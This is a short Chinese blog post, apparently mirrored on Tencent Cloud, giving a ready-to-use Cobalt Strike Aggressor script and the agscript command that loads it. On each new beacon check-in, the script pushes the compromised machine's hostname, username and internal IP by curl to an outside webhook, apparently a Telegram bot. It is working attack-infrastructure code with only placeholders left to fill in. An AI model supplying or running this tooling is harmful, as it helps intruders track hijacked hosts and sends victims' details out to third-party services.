Cobalt Strike上线推送
Cobalt Strike上线推送
R0A1NG
发布于 2022-03-09 08:33:19
发布于 2022-03-09 08:33:19
创建一个文件为xxx.cna,把以下内容放进去,自行修改推送链接等
$teamserver_hostname = 'server'; # 自定义一个名称
# 首次开启推送
$tg_bot_webhookURL = ''; # 需要发送的url
$test_message = 'CS上线监听开启'; # 首次发送的消息
@curl_command = @('curl', '-X', 'POST', '--data', 'key=xxxxx', '--data', 'msg='.$test_message, $tg_bot_webhookURL); # 每个post参数前加一个--data
exec(@curl_command);
# 上线推送
on beacon_initial {
println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1, "pid"));
local('$internalIP $computerName $userName');
$internalIP = replace(beacon_info($1, "internal"), " ", "_");
$computerName = replace(beacon_info($1, "computer"), " ", "_");
$userName = replace(beacon_info($1, "user"), " ", "_");
$message = 'Message from '.$teamserver_hostname.' Server%0aBeacon success implant Info Target:%0aComputer name : '.$computerName.'%0aUsername : '.$userName.'%0aIpaddres : '.$internalIP; # 推送上线主机名、用户名、内网IP
@curl_command = @('curl', '-X', 'POST', '--data', 'key=xxxxx', '--data', 'msg='.$message, $tg_bot_webhookURL); # 每个post参数前加一个--data
exec(@curl_command);
}开启推送
./agscript ip port 用户名 密码 ./xxx.cna
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022 年 03 月,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录